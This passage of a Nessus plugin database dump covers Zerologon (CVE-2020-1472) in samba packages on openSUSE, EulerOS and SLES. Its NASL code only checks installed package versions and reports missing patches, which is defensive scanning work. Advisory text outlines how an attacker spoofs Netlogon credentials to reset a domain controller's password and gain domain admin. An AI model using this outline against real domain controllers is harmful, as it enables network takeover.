reference:\"libsamba-policy0-python3-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap2-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap2-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-ad-dc-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-ad-dc-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-client-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-client-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-core-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-debugsource-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-dsdb-modules-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-dsdb-modules-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-python3-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-python3-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-python3-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-python3-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-test-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-test-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-winbind-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-winbind-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi-devel-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ceph-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-debuginfo / ctdb-pcp-pmda / ctdb-pcp-pmda-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:25:19", "description": "According to the version of the samba packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-30T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : samba (EulerOS-SA-2020-2299)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libsmbclient", "p-cpe:/a:huawei:euleros:libwbclient", "p-cpe:/a:huawei:euleros:samba", "p-cpe:/a:huawei:euleros:samba-client", "p-cpe:/a:huawei:euleros:samba-client-libs", "p-cpe:/a:huawei:euleros:samba-common", "p-cpe:/a:huawei:euleros:samba-common-libs", "p-cpe:/a:huawei:euleros:samba-common-tools", "p-cpe:/a:huawei:euleros:samba-libs", "p-cpe:/a:huawei:euleros:samba-python", "p-cpe:/a:huawei:euleros:samba-winbind", "p-cpe:/a:huawei:euleros:samba-winbind-clients", "p-cpe:/a:huawei:euleros:samba-winbind-modules", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2299.NASL", "href": "https://www.tenable.com/plugins/nessus/142110", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142110);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"EulerOS 2.0 SP5 : samba (EulerOS-SA-2020-2299)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2299\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cb63ee7d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libsmbclient-4.7.1-9.h21.eulerosv2r7\",\n \"libwbclient-4.7.1-9.h21.eulerosv2r7\",\n \"samba-4.7.1-9.h21.eulerosv2r7\",\n \"samba-client-4.7.1-9.h21.eulerosv2r7\",\n \"samba-client-libs-4.7.1-9.h21.eulerosv2r7\",\n \"samba-common-4.7.1-9.h21.eulerosv2r7\",\n \"samba-common-libs-4.7.1-9.h21.eulerosv2r7\",\n \"samba-common-tools-4.7.1-9.h21.eulerosv2r7\",\n \"samba-libs-4.7.1-9.h21.eulerosv2r7\",\n \"samba-python-4.7.1-9.h21.eulerosv2r7\",\n \"samba-winbind-4.7.1-9.h21.eulerosv2r7\",\n \"samba-winbind-clients-4.7.1-9.h21.eulerosv2r7\",\n \"samba-winbind-modules-4.7.1-9.h21.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-19T15:32:02", "description": "The Netlogon service on the remote host is vulnerable to the zerologon vulnerability. An unauthenticated, remote attacker can exploit this, by spoofing a client credential to establish a secure channel to a domain controller using the Netlogon remote protocol (MS-NRPC). The attacker can then use this to change the computer's Active Directory (AD) password, and escalate privileges to domain admin.\n\nIn order for this plugin to run, you must disable 'Only use credentials provided by the user' in the scanner settings.", "cvss3": {}, "published": "2020-09-18T00:00:00", "type": "nessus", "title": "Microsoft Netlogon Elevation of Privilege (Zerologon) (Remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "href": "https://www.tenable.com/plugins/nessus/140657", "sourceData": "Binary data netlogon_zerologon_CVE-2020-1472.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:37", "description": "This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nFixed an issue where multiple home folders were created(bsc#1174316, bso#13369).\n\nFixed an issue where the net command was unable to negotiate SMB2 (bsc#1174120);\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : samba (SUSE-SU-2020:2721-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap0", "p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-libs", 